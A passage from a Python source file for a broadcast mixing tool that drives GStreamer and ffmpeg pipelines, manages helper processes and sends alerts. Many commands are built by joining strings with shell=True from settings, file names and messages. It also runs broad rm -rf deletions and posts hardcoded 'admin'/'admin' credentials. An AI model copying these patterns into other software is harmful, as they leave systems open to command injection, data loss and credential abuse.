\n\t\tself.ffmpeg_pid = 0 \n\t\tself.snowmix_proc = 'Off'\n\t\t#Pipeline is None when we start\n\t\tself.pipeline = None\n\t\tself.gst_pipeline_state = 'NULL'\n\t\t#load settings\n\t\tself.load_settings()\n\t\tself.pipeline_number = 0\n\t\tself.pipelines = {}\n\t\tself.pipelines_desc = {}\n\t\tself.busses = {}\n\t\t#delete all graphs, .dot and .png from folder\n\t\tsubprocess.call('rm -rf '+self.loaded_settings['gst_graph_path']+'*.dot ' +self.loaded_settings['gst_graph_path']+'*.png', shell=True)\n\t\tprint('delete ' + self.loaded_settings['gst_graph_path']+'*.dot') \n\t\t#only after we have the settings we can try to launch pipeline\n\t\tself.launch_pipeline()\n\n\n#################################\t\n# Settings\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef load_settings(self):\n\t\ttry:\n\t\t\tself.parsettings = parsettings(self.mixter_settings_path)\n\t\t\tself.loaded_settings = self.parsettings.loadSettings()\n\t\t\tself.log_message('[DEBUG] Configuraciones cargadas')\n\t\texcept:\n\t\t\tprint(\"MIXTER LOG: ERROR, no se pudo cargar el archivo de configuracion o se cargo con errores\")\n\t\t\tself.log_message('[ERROR] no se pudo cargar el archivo de configuracion o se cargo con errores')\n\n\t\t#activate gstreamer graphs\n\t\tos.environ[\"GST_DEBUG_DUMP_DOT_DIR\"] = self.loaded_settings['gst_graph_path']\n\t\tprint(\"MIXTER LOG: DEBUG, GST_DEBUG_DUMP_DOT_DIR : \" + os.environ['GST_DEBUG_DUMP_DOT_DIR'])\n\t\tself.log_message('[DEBUG] GST_DEBUG_DUMP_DOT_DIR : ' + os.environ['GST_DEBUG_DUMP_DOT_DIR'])\n\n\n#################################\t\n# Check external programs\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef launch_pipeline(self):\n\t\t#After settings are loaded, if auto_launch is On, we build gstreamer pipeline\n\t\tif self.loaded_settings['auto_launch']=='On':\n\t\t\t#before we launch gstreamer, we need to check additional applications, if they are On, like obplayer, brave\n\t\t\tself.log_message(\"[DEBUG] Auto_launch activo, se intentara lanzar tuberia\")\n\t\t\t#start from an empty list; obplayer, snowmix and brave are appended as needed\n\t\t\tprograms_to_launch = []\n\t\t\tif self.loaded_settings['obplayer'] == 'On':\n\t\t\t\tprograms_to_launch.append('obplayer')\n\t\t\tif self.loaded_settings['snowmix'] == 'On':\n\t\t\t\tprograms_to_launch.append('snowmix')\n\t\t\tif self.loaded_settings['brave'] == 'On':\n\t\t\t\tprograms_to_launch.append('brave')\n\n\t\t\tif len(programs_to_launch)!=0:\n\t\t\t\tself.log_message(\"[DEBUG] Se intentara lanzar \" + str(programs_to_launch))\n\t\t\t\tif self.launch_secondary_programs(programs_to_launch):\n\t\t\t\t\tprint(\"MIXTER LOG: Lanzados programas secundarios\")\n\t\t\t\t\tself.log_message(\"[DEBUG] Lanzados programas secundarios\")\n\t\t\t\t\t#FIXME do we want to check on them ?\n\t\t\t\t\t#self.check_input_and_build_pipeline()\n\t\t\t\t\tself.build_multiple_pipelines()\n\n\t\t\telse:\n\t\t\t\tself.build_multiple_pipelines()\n\t\t\t\t#self.reconnect()\n\n\t\telse:\n\t\t\tself.log_message(\"[DEBUG] Auto_launch desactivado, lanzar a mano\")\n\t\n\t#Launch external programs\n\tdef launch_secondary_programs(self,programs_to_launch):\n\t\tall_programs_checked = True\n\t\t\n\t\tfor p in programs_to_launch:\n\t\t\tall_programs_checked = all_programs_checked and self.try_execute_program(p,5)\n\t\t\t#always restart brave the first time ?\n\t\treturn all_programs_checked\n\n\tdef try_execute_program(self,p,counter=5):\n\t\tif not self.check_process(p) and counter > 0:\n\t\t\tprint(\"MIXTER LOG: Intentando lanzar \" + 
p)\n\t\t\tself.log_message('[DEBUG] Intentando lanzar ' + p)\n\t\t\tself.execute_program(p)\n\t\t\t#FIXME sleep here is because process can exist, but the program is not yet sending streaming, we need to check when streaming is ok\n\t\t\ttime.sleep(3)\n\t\t\tif not self.check_process(p):\n\t\t\t\tcounter -= 1\n\t\t\t\t#propagate the retry result instead of always reporting failure\n\t\t\t\treturn self.try_execute_program(p,counter)\n\t\t#True if the process is finally running, False when all retries ran out\n\t\treturn self.check_process(p)\n\n\n\n#################################\t\n# GSTREAMER build Pipelines \t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef build_multiple_pipelines(self):\n\t\tpipeline_list = json.loads(self.loaded_settings['pipeline_list'])\n\t\t#order matters, so insert in sorted-key order (dicts preserve insertion order)\n\t\tpipeline_list_sorted = {}\n\t\tkeys_sorted = sorted(pipeline_list)\n\t\tfor n in keys_sorted:\n\t\t\tpipeline_list_sorted[n]=pipeline_list[n]\n\n\t\tfor n in pipeline_list_sorted:\n\t\t\t#print(pipeline_list[n])\n\t\t\tprint('MIXTER LOG: Building multiple pipelines')\n\t\t\tself.log_message('[DEBUG] Building multiple pipelines')\n\t\t\tprint('MIXTER LOG: Calling build_pipeline with: ' + str(pipeline_list_sorted[n]))\n\t\t\t#self.load_settings()\n\t\t\t#self.parsettings = parsettings(self.mixter_settings_path)\n\t\t\t#self.parsettings.saveSettings(pipeline_list[n])\n\t\t\t#self.load_settings()\n\t\t\tself.build_pipeline('',pipeline_list_sorted[n])\n\n\tdef build_pipeline(self,pipeline_text='',pipeline_settings=''):\n\t\tpipes = Pipes()\n\n\t\tif pipeline_text=='':\n\t\t\tif pipeline_settings=='':\n\t\t\t\tpipeline_settings = self.loaded_settings\n\n\t\tpipeline_number = self.pipeline_number\n\t\tself.pipelines_desc[pipeline_number] = {}\n\t\tself.pipelines_desc[pipeline_number]['pipeline_id'] = 'p_'+str(self.pipeline_number)\n\n\n\t\tif 'pipeline_type' in pipeline_settings and pipeline_settings['pipeline_type']=='ffmpeg':\n\t\t\tif not 'service_name' in pipeline_settings:\n\t\t\t\tpipeline_settings['service_name'] = 'Mixter service'\n\t\t\tself.ffmpeg_launch(pipes.ffmpeg_pipeline(pipeline_settings))\n\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipes.ffmpeg_pipeline(pipeline_settings))\n\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings\n\t\t\tself.pipelines_desc[pipeline_number]['pid'] = self.ffmpeg_pid\n\n\t\telse:\n\t\t\tif pipeline_text=='':\n\t\t\t\tif pipeline_settings['output_type']=='shm_sink' and pipeline_settings['input_1_type']=='shm_1_src':\n\t\t\t\t\t#FIXME when we launch a pipeline not using gst.parse.launch we still need to control it\n\t\t\t\t\tprint('launched continuity.py from http_server')\n\t\t\t\t\tself.CONTINUITY = Continuity()\n\t\t\t\t\tself.pill2kill = threading.Event()\n\t\t\t\t\tself.threadCA = threading.Thread(target=self.CONTINUITY.main, args=(pipeline_settings,))\n\t\t\t\t\tself.threadCA.setDaemon(False)\n\t\t\t\t\tself.threadCA.start()\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = {\"pipeline_name\":\"CONTINUITY\",\"input_1_type\":\"shm_1_src\",\"output_type\":\"shm_sink\",\"input_2_type\": \"none_2_src\",\"pipeline_type\": \"gstreamer\",\"video_sink\": pipeline_settings['video_sink'], \"audio_sink\":pipeline_settings['audio_sink'],\"color_format_sink\":pipeline_settings['color_format_sink']}\n\t\t\t\telse:\n\t\t\t\t\tself.pipelines[pipeline_number] = Gst.parse_launch(pipes.pipe_to_launch(pipeline_settings))\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipes.pipe_to_launch(pipeline_settings))\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings or 
self.settings_string_to_array(pipes.get_settings_needed())\n\t\t\t\t\tself.connect_bus(pipeline_number)\n\t\t\t\tprint(\"MIXTER LOG: Lanzando desde: \" + pipeline_settings['input_1_type'] + \" hasta: \" + pipeline_settings['output_type'])\n\t\t\t\tself.log_message('[DEBUG] Lanzando desde: ' + pipeline_settings['input_1_type'] + \" hasta: \" + pipeline_settings['output_type'])\n\t\t\telse:\n\t\t\t\tself.pipelines[pipeline_number] = Gst.parse_launch(pipeline_text)\n\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_text'] = str(pipeline_text)\n\t\t\t\tif pipeline_settings=='':\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = {\"pipeline_name\":\"from text\",\"input_1_type\":\"unknown\",\"output_type\":\"unknown\"}\n\t\t\t\telse:\n\t\t\t\t\tself.pipelines_desc[pipeline_number]['pipeline_settings'] = pipeline_settings\n\t\t\t\tself.connect_bus(pipeline_number)\n\n\n\t\tself.pipeline_number += 1\n\n\tdef connect_bus(self,pipeline_number):\n\t\t#Lanzar la tuberia y conectarse al bus\n\t\tself.busses[pipeline_number] = self.pipelines[pipeline_number].get_bus()\n\t\tself.busses[pipeline_number].add_signal_watch()\n\t\tself.busses[pipeline_number].enable_sync_message_emission()\n\t\tself.busses[pipeline_number].connect(\"message\", self.on_message, pipeline_number)\n\t\tself.busses[pipeline_number].connect(\"sync-message::element\", self.on_sync_message)\n\t\tself.busses[pipeline_number].connect(\"sync-message::stream-status\", self.on_stream_message)\n\n\t\tself.pipelines[pipeline_number].set_name('p_'+str(self.pipeline_number))\n\t\tprint('MIXTER LOG: Tuberia construida, bus conectado')\n\t\tself.log_message('[DEBUG] Pipeline: Tuberia construida, bus conectado ' + str(self.pipelines[pipeline_number].get_name()))\t\n\t\t#latencia \n\t\tself.latency = self.pipelines[pipeline_number].get_latency()\n\t\tprint('MIXTER LOG: Latencia ' + str(self.latency))\n\n\t\tself.pipelines[pipeline_number].set_state(Gst.State.PLAYING)\n\t\t#TODO this is not the best way to check pipeline state\n\t\tself.gst_pipeline_state = 'PLAYING'\n\t\tprint('MIXTER LOG: GST state ' + self.gst_pipeline_state)\n\t\tself.log_message('[DEBUG] GST state ' + self.gst_pipeline_state)\n\n\t\t#self.pipelines_desc[pipeline_number]['pipeline_id'] = str(self.pipelines[pipeline_number].get_name())\n\n\t\t#self.pipelines_desc[pipeline_number]['pipeline_settings_used'] = pipeline_settings or self.settings_string_to_array(pipes.get_settings_needed())\n\t\t#gstreamer graphs\n\t\tGst.debug_bin_to_dot_file(self.pipelines[pipeline_number],Gst.DebugGraphDetails(15),self.pipelines_desc[pipeline_number]['pipeline_id'])\n\t\tself.dot_to_png(self.pipelines_desc[pipeline_number]['pipeline_id'])\n\n\n\tdef ffmpeg_launch(self,ffmpeg_pipeline):\n\t\tprint(' ffmpeg_pipeline: ' +str(ffmpeg_pipeline))\n\t\t#self.kill_ffmpeg()\n\t\tffmpeg_tcp = subprocess.Popen(self.loaded_settings['ffmpeg_path']+\"/ffmpeg \"+ffmpeg_pipeline, shell=True, stdout=subprocess.PIPE)\n\t\tself.ffmpeg_pid=int(ffmpeg_tcp.pid)\t\t\t\t\t\t\n\t\tprint(\"MIXTER LOG: UDP streaming with FFMPEG PID \"+str(self.ffmpeg_pid))\n\t\tself.log_message('[DEBUG] UDP streaming with FFMPEG PID '+str(self.ffmpeg_pid))\n\n\n#################################\t\n# Overlay\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\n\tdef toggle_overlay(self,imgdata):\n\t\t#self.load_settings()\n\t\tdata = json.loads(imgdata)\n\t\tpipeline_number = int(data['pipeline_number'])\n\t\toverlay_id = str(data['id'])\n\t\toverlay_src = str(data['src'])\n\t\tsvgoverlay = 
self.pipelines[pipeline_number].get_by_name('svgoverlay'+overlay_id)\n\t\tsvgoverlay.set_property('location', overlay_src)\n\n\tdef toggle_textoverlay(self,string):\n\t\t#self.load_settings()\n\t\t#textoverlay.connect('draw', self.on_draw,string)\n\t\tself.cairotextstring = str(string)\n\t\t#data = string.decode('UTF-8')\n\t\tdata = json.loads(string)\n\t\tself.cairotextstring = str(data['string'])\n\t\tself.cairotextmove_to_x = int(data['move_to_x'])\n\t\tself.cairotextmove_to_y = int(data['move_to_y'])\n\t\tself.cairotextfont_size = int(data['font_size'])\n\n\t\tpipeline_number = int(data['pipeline_number'])\n\t\ttextoverlay = self.pipelines[pipeline_number].get_by_name('textoverlay')\n\t\ttextoverlay.connect('draw', self.on_draw)\n\n\n\tdef on_draw(self, _overlay, context, _timestamp, _duration):\n\t\t\"\"\"Each time the 'draw' signal is emitted\"\"\"\n\t\tcontext.select_font_face('Open Sans', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)\n\t\tcontext.set_font_size(self.cairotextfont_size)\n\t\tcontext.move_to(self.cairotextmove_to_x,self.cairotextmove_to_y)\n\t\tcontext.text_path(self.cairotextstring)\n\t\tcontext.set_source_rgb(1, 1, 1)\n\t\tcontext.fill_preserve()\n\t\tcontext.set_source_rgb(0, 0, 0)\n\t\tcontext.set_line_width(1)\n\t\tcontext.stroke()\n\n\n#################################\t\n# GST-messages\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\tdef on_message(self, bus, message, pipeline_number):\n\t\t#print(\"MIXTER LOG message: Mensaje de GST recibido\")\n\t\tt = message.type\n\t\tif t == Gst.MessageType.EOS:\n\t\t\tself.log_message(\"[ERROR] EOS from pipeline_\"+ str(pipeline_number))\t\n\t\t\tself.reconnect(pipeline_number)\n\t\telif t == Gst.MessageType.ERROR:\n\t\t\tself.reconnect(pipeline_number)\n\t\t\terr, debug = message.parse_error()\n\t\t\terror=\"Error: %s\" % err, debug\n\t\t\tprint(\"MIXTER LOG message: Error:\" + str(error))\n\t\t\tself.log_message(\"[ERROR] from pipeline_\"+ str(pipeline_number)+' '+ str(error))\n\t\t\tself.handle_msg(debug)\n\t\t\t\n\t\telif t == Gst.MessageType.BUFFERING:\n\t\t\tpercent = message.parse_buffering()\n\t\t\tif percent > 60:\n\t\t\t\tprint(\"MIXTER LOG message: Porcentaje de buffering (imprimir solo mas de 60%): \" + str(percent))\n\t\t\t\tself.log_message(\"[BUFFER] Porcentaje: \"+ str(percent))\t\n\t\t\n\t\telif t == Gst.MessageType.ELEMENT:\n\t\t\tmsg = message.get_structure()\n\t\t\tmsgstr=str(msg.get_name())\n\t\t\t#Recibir mensaje cada vez que se genera un nuevo fichero (cuando finaliza la escritura)\n\t\t\tif msgstr==\"GstMultiFileSink\":\t\n\t\t\t\tprint(\"MIXTER LOG: Nuevo fichero\")\n\t\t\t\tfilename=(message.get_structure().get_string(\"filename\"))\n\t\t\t\tnew_filename=int(int(time.time())-(int(self.loaded_settings['file_duration'])/1000000000))\n\t\t\t\t#timestamp gives local time, we have to calculate difference between UTC and local\n\t\t\t\ttimestamp_epoch = self.timestamp_at_midnight(new_filename)\n\t\t\t\t#crear una carpeta para guardar el fichero y otra para los thumbs\n\t\t\t\tsubprocess.Popen(\"mkdir -p \"+self.loaded_settings['file_path']+timestamp_epoch+\"/thumbs\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\tnew_filename=str(new_filename)\n\t\t\t\tlong_path = self.loaded_settings['file_path']+'/'+timestamp_epoch+'/'\n\t\t\t\tnew_filename = long_path+new_filename+\".mp4\"\n\t\t\t\t#subprocess.Popen(\"mv \"+filename+\" \"+new_filename, shell=True, stdout=subprocess.PIPE)\n\t\t\t\t#Reparar fichero y moverlo ¿ -bsf:a aac_adtstoasc ? 
y #Crear un thumbnail cada hora y guardarlo en almacenamiento\n\t\t\t\tsubprocess.Popen(\"ffmpeg -probesize 100M -analyzeduration 100M -i \"+filename+\" -c copy -movflags +faststart -bsf:a aac_adtstoasc \"+new_filename+\"; ffmpeg -probesize 100M -analyzeduration 100M -i \"+new_filename+\" -vf fps=1/3600 \"+long_path+\"thumbs/thumb%03d.jpg\", shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\n\t\t\t\tprint(\"MIXTER LOG: Intentando crear fichero y thumbs: \" + new_filename)\n\t\t\t\tself.log_message(\"[DEBUG] Intentando crear fichero y thumbs: \" + new_filename)\n\n\tdef on_sync_message(self, bus, message):\n\t\tt = message.type\n\t\tif t == Gst.MessageType.BUFFERING:\n\t\t\tpercent = message.parse_buffering()\n\t\t\tif percent > 66:\n\t\t\t\tprint(\"MIXTER LOG sync: Porcentaje de buffering (imprimir solo mas de 66%): \" +str(percent))\n\t\t\t\tself.log_message(\"[BUFFER] (sync) Porcentaje: \"+ str(percent))\n\n\tdef on_stream_message(self, bus, message):\n\t\ttype, owner = message.parse_stream_status()\n\t\tr = \"STREAM: %s\" % type, owner\n\t\t#print(\"MIXTER LOG message: Stream status\" + str(r))\n\t\t#TODO definir niveles de log\n\t\t#self.log_message(\"[STREAMING] \" + str(r))\n\n\t#Manejar mensajes, sobre todo de error. Actuar de diferente manera segun sea el error, desactivando componentes o lo que convenga en cada caso\n\tdef handle_msg(self, msg):\n\t\tif msg.find(\"Could not connect to RTMP stream\") != -1:\n\t\t\tself.total_errors+=1\n\t\t\tprint('MIXTER LOG: No se puede conectar por RTMP. Comprobar configuracion ' + str(self.total_errors))\n\t\t\tself.log_message(\"[ERROR] : No se puede conectar por RTMP. Comprobar configuracion\")\n\t\t\t#time.sleep(4)\n\t\t\tif self.total_errors>=5:\n\t\t\t\tprint('MIXTER LOG: demasiados intentos, se desactiva RMTP')\n\t\t\t\tself.log_message(\"[ERROR] : demasiados intentos, se desactiva RMTP\")\n\t\t\t\tself.send_email('[ERROR] : demasiados intentos, se desactiva RMTP')\n\t\t\t\tself.loaded_settings['rtmp']='Off'\n\t\t\t\t#TODO lanzar un script que compruebe el estado del RTMP\n\n\n\n#################################\t\n# Methods\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t#\n#################################\n\t#TODO not the best way to do it and should return PLAYING, NULL, PAUSED...\n\tdef check_pipeline_status(self):\n\t\tif self.gst_pipeline_state == 'PLAYING':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" \n\tdef kill_ffmpeg(self):\n\t\t#FIXME detectar mejor solo el proceso que queremos matar de FFMPEG\n\t\tsubprocess.call(\"killall ffmpeg\", shell=True)\n\t\tif self.ffmpeg_pid!=0:\n\t\t\tprint(\"MIXTER LOG: Trying to kill FFMPEG...\"+str(self.ffmpeg_pid))\n\t\t\tself.log_message('[DEBUG] Trying to kill FFMPEG ...'+str(self.ffmpeg_pid))\n\t\t\t#subprocess.call(\"kill -9 \"+str(self.ffmpeg_pid), shell=True)\n\t\t\tself.ffmpeg_pid = 0\n\t\telse:\n\t\t\tprint(\"MIXTER LOG: FFMPEG no se esta ejecutando\")\n\t\t\tself.log_message('[DEBUG] FFMPEG no se esta ejecutando')\n\t\"\"\"\n\n\tdef log_message(self, message):\n\t\tfile_log = open(self.loaded_settings['log_path']+'/mixter.log','a')\n\t\tfile_log.write('['+ datetime.datetime.now().strftime(\"%A, %d. %B %Y %H:%M%p:%S%p\")+']' + message + '\\n') \n\t\tfile_log.close()\n\t\t#Acortar mensaje\n\t\t#message = message[0:80]\n\t\tif len(self.log_window_message.split('\\n'))>10:\n\t\t\tlogs_splited=self.log_window_message.split('\\n',1)[1]\n\t\t\tself.log_window_message=str(logs_splited)\n\t\tself.log_window_message += '['+ datetime.datetime.now().strftime(\"%A, %d. 
%B %Y %H:%M%p:%S%p\")+']' + message + '\\n'\n\t\ttry:\n\t\t\tself.log_window.set_text(self.log_window_message)\n\t\texcept:\n\t\t\tpass\n\n\n\tdef disconnect(self, n, m=0):\n\t\tGtk.main_quit()\n\n\t#El check solo tiene que devolver el valor, otra funcion se encargara de actuar en consecuencia\n\tdef check_shm(self):\n\t\tmem_available = subprocess.Popen(\"df -k /dev/shm/ | awk 'NR==2 {print $4}'\", shell=True, stdout=subprocess.PIPE)\n\t\tmem_available = int(mem_available.stdout.read())\n\t\treturn mem_available\n\t\n\tdef check_ram(self):\n\t\tmem_available = subprocess.Popen(\"free | awk 'NR==2 {print $3}'\", shell=True, stdout=subprocess.PIPE)\n\t\tmem_available = int(mem_available.stdout.read())\n\t\treturn mem_available\n\t#FIXME MAL HECHO, esto da falsos positivos probablemente hay que pasar el resultado a FLOAT\n\tdef check_cpu(self):\n\t\tcpu_usage = subprocess.Popen(\"uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print $3}' | sed -s 's/,$//gi'\", shell=True, stdout=subprocess.PIPE)\n\t\t#para sacar solo entero:\" uptime | grep -ohe 'load average[s:][: ].*' | awk '{ print substr ($3, 0, 1)}'\"\n\t\tcpu_usage = cpu_usage.stdout.read().decode(\"utf-8\").rstrip()\n\t\tcores_number = subprocess.Popen(\"nproc\", shell=True, stdout=subprocess.PIPE)\n\t\tcores_number = cores_number.stdout.read().decode(\"utf-8\").rstrip()\n\t\tif cpu_usage[0:1]>=cores_number:\n\t\t\tprint(\"MIXTER LOG: Uso de CPU elevado, Intentando relanzar Obplayer y Snowmix\")\n\t\t\tself.log_message(\"[WARNING] Uso de CPU elevado, Intentando matar y relanzar Obplayer y Snowmix\")\n\t\t\t#self.send_email(\"[WARNING] Uso de CPU elevado, Intentando matar y relanzar Obplayer y Snowmix\")\n\t\t\tprint(\"MIXTER LOG: Desactivado el reinicio por uso de CPU elevado\")\n\t\t\tself.log_message(\"[WARNING] Desactivado el reinicio por uso de CPU elevado\")\n\t\t\t#self.restart_all(1)\n\t\treturn cpu_usage+'/'+cores_number\n\t\t\n\n\tdef check_shm_and_restart(self):\n\t\tmem_available = self.check_shm()\n\t\tif mem_available < 1000000:\n\t\t\tprint(\"MIXTER LOG: WARNING, Memoria compartida a punto de rebasar, disponible solo: \" + str(mem_available))\n\t\t\tself.log_message(\"[WARNING] Memoria compartida a punto de rebasar, disponible solo: \" + str(mem_available))\t\t\t\n\t\t\t#Si el mem_available es menor que X borrar /dev/shm y relanzar todo\n\t\t\tself.restart_all(1)\t\n\t\t\t#print(\"MIXTER LOG: DESACTIVADO EL REINICIO POR FALTA DE SHM\")\n\t\telse:\n\t\t\tprint(\"MIXTER LOG: Memoria compartida disponible: \" + str(mem_available))\n\n\t#dado el nombre de un proceso, verificar si existe\n\tdef check_process(self,process):\n\t\tif process == 'brave':\n\t\t\ttry:\n\t\t\t\trequest = requests.get(self.loaded_settings['brave_path']+'/api/outputs', data='',timeout=1);\n\t\t\t\tif request.status_code == 200:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\t\texcept:\n\t\t\t\treturn False\n\n\t\tprocess_check = subprocess.call('ps -U `whoami` | grep \"'+process+'\"', shell=True)\n\t\tif process_check==1:\n\t\t\treturn False\n\t\telse:\n\t\t\t# meter el proceso en el array de procesos y hacerlo solo con los del usuario\n\t\t\tprocess_pid = subprocess.Popen(\"ps -U `whoami` | grep \"+process+\" | awk 'NR==1{ print $1}'\", shell=True, stdout=subprocess.PIPE)\n\t\t\tprocess_pid = process_pid.stdout.read().decode(\"utf-8\").rstrip()\t\n\t\t\tif not process_pid in self.processes:\n\t\t\t\tself.processes.extend([process_pid])\n\t\t\treturn True\n\n\tdef execute_program(self,program):\n\t\tself.log_message(\"[DEBUG] 
Ejecutando \" + program)\n\t\tprint('MIXTER LOG: Ejecutando ' + program)\n\n\t\tif self.check_process(program):\n\t\t\tself.log_message(\"[DEBUG] \"+program+\" deberia estar funcionando\")\n\t\t\tprint('MIXTER LOG: '+program+' deberia estar funcionando')\n\t\telse:\n\t\t\tif program == 'snowmix':\n\t\t\t\ttry:\n\t\t\t\t\t#subprocess.call(\"/usr/local/lib/Snowmix-0.5.1/scripts/obplayer\", shell=True)\n\t\t\t\t\tfile_log = open(self.loaded_settings['log_path']+'/snowmix.log','a')\n\t\t\t\t\tp = subprocess.Popen(\"/bin/bash /usr/local/lib/Snowmix-0.5.1/scripts/obplayer\", shell=True, stdout=file_log)\n\t\t\t\t\tfile_log.close()\n\t\t\t\t\t#we need to wait for the snowmix/obplayer script to finish\n\t\t\t\t\ttime.sleep(5)\n\t\t\t\texcept:\n\t\t\t\t\tself.log_message(\"[ERROR] snowmix no pudo ejecutarse\")\n\t\t\t\t\tprint('MIXTER LOG: snowmix no pudo ejecutarse')\n\n\t\t\telif program == 'obplayer':\n\t\t\t\ttry:\n\t\t\t\t\tsubprocess.Popen(self.loaded_settings['obplayer_path'], shell=True, stdout=subprocess.PIPE)\n\t\t\t\t\t#subprocess.Popen(args=['gnome-terminal', '--' ,self.loaded_settings['obplayer_path']])\t\n\t\t\t\texcept:\n\t\t\t\t\t#subprocess.Popen(args=['xterm', '-e' , self.loaded_settings['obplayer_path']])\n\t\t\t\t\t#subprocess.Popen(self.loaded_settings['obplayer_path'])\n\t\t\t\t\tprint('MIXTER LOG: unable to launch '+program)\n\n\t\t\telif program == 'brave':\n\t\t\t\ttry:\n\t\t\t\t\tself.restart_brave()\n\t\t\t\texcept:\n\t\t\t\t\tself.log_message(\"[ERROR] brave no pudo reiniciarse\")\n\t\t\t\t\tprint('MIXTER LOG: brave no pudo reiniciarse')\n\n\tdef restart_brave(self):\n\t\tprint('MIXTER LOG: Restarting brave...')\n\t\tself.log_message(\"[DEBUG] Restarting brave...\")\n\t\trequests.post(self.loaded_settings['brave_path']+'/api/restart', data= '{\"config\":\"current\"}');\n\n\tdef cleanup_tmp(self, widget):\n\t\tprint('MIXTER LOG: Eliminando archivos temporales...')\n\t\tself.log_message(\"[DEBUG] Eliminando archivos temporales...\")\n\t\tsubprocess.call('rm -rf /tmp/audio* /tmp/video* /tmp/mixer* /tmp/mixter* /tmp/feed* /tmp/audioSn* /tmp/brave*', shell=True)\n\n\tdef cleanup_shm(self, widget):\n\t\tprint('MIXTER LOG: Eliminando archivos temporales y vaciando /dev/shm...')\n\t\tself.log_message(\"[DEBUG] Eliminando archivos temporales y vaciando /dev/shm...'\")\n\t\t#DANGEROUS! 
be careful with other users\n\t\tsubprocess.call('rm -rf /dev/shm/shm*', shell=True)\n\n\tdef flush(self, widget):\n\t\tnow=datetime.datetime.now().strftime(\"%Y%m%d-%H_%M%p\")\n\t\tprint('MIXTER LOG: Renombrando mixterlog a mixterlog-'+now+' ...')\n\t\tself.log_message(\"[DEBUG] Flush log: Log cerrado \"+now)\n\t\tsubprocess.call('mv '+self.loaded_settings['log_path']+'/mixter.log '+self.loaded_settings['log_path']+'/'+now+'.mixter.log', shell=True)\n\t\tself.log_message(\"[DEBUG] Flush log: Log anterior cerrado en \"+now+\" .mixter.log\")\n\n\tdef kill_process(self,pid):\n\t\tprint('MIXTER LOG: Trying to kill process ' + pid)\n\t\tself.log_message(\"[WARNING] Trying to kill process \" + pid)\n\t\tself.processes.remove(pid)\n\t\tsubprocess.call(\"kill -9 \"+pid, shell=True)\n\n\t##TODO killall and restart, new way\n\tdef clean_kill_and_restart(self):\n\t\tprint('MIXTER LOG: Trying to clean and restart everything')\n\t\tself.log_message(\"[WARNING] *******Trying to clean and restart everything*******\")\n\t\tself.kill_all_pipelines()\n\t\tself.cleanup_tmp(1)\n\t\tself.cleanup_shm(1)\n\t\tfor process in self.processes:\n\t\t\tself.kill_process(process)\n\n\t\tif self.loaded_settings['snowmix'] == 'On':\n\t\t\tsubprocess.call(\"killall obplayer2feed output2shmsink output2shmsink_seba wish\", shell=True)\n\n\t\tif self.loaded_settings['brave'] == 'On':\n\t\t\tself.restart_brave()\n\t\t\tself.launch_pipeline()\n\n#################################\t\n# Notification channels\t\t\t#\n#\t\t\t \t\t\t\t#\n#################################\n\n\tdef send_email(self, message):\n\t\ttry:\n\t\t\tsubprocess.call('python3 '+self.mixter_path+'/sendemail.py '+ message, shell=True)\n\t\t\tprint('MIXTER LOG: email enviado')\n\t\t\tself.log_message(\"[DEBUG] email enviado\")\n\t\texcept:\n\t\t\tprint('MIXTER LOG: No se pudo enviar email de alerta, comprobar el archivo de settings')\n\t\t\tself.log_message(\"[ERROR] No se pudo enviar email de alerta, comprobar el archivo de settings\")\n\n\tdef send_telegram_msg(self, message):\n\t\ttry:\n\t\t\trequests.post(self.loaded_settings['telegram_notifications'], data='{\"user\":\"admin\",\"pass\":\"admin\",\"msg\":\"'+message+'\"}')\n\t\t\tprint('MIXTER LOG: mensaje Telegram enviado')\n\t\t\tself.log_message(\"[DEBUG] mensaje Telegram enviado\")\n\t\texcept:\n\t\t\tprint('MIXTER LOG: No se pudo enviar mensaje Telegram de alerta, comprobar el archivo de settings')\n\t\t\tself.log_message(\"[ERROR] No se pudo enviar mensaje Telegram de alerta, comprobar el archivo de settings\")\n\t\t\n#################################\t\n# Helpers\t\t\t\t\t\t#\n#\t\t\t \t\t\t\t#\n#################################\n\t#Return epoch at 00:00 of the local date\n\tdef timestamp_at_midnight(self, time_to_convert=None):\n\t\t#evaluate time.time() at call time; a default argument would be frozen at import time\n\t\tif time_to_convert is None:\n\t\t\ttime_to_convert = time.time()\n\t\ttime_to_convert = int(time_to_convert)\n\n\t\ttimestamp_UTC = int(datetime.datetime.utcfromtimestamp(time_to_convert).timestamp())\n\t\ttimestamp_LOCAL = int(datetime.datetime.fromtimestamp(time_to_convert).timestamp())\n\t\ttime_difference = timestamp_LOCAL - timestamp_UTC\n\n\t\ttimestamp_epoch = int(int(timestamp_LOCAL) + int(time_difference))\n\n\t\tyear_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%Y'))\n\t\tmonth_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%m'))\n\t\tday_UTC = int(datetime.datetime.utcfromtimestamp(timestamp_epoch).strftime('%d'))\n\n\t\ttimestamp_at_midnight_UTC = 
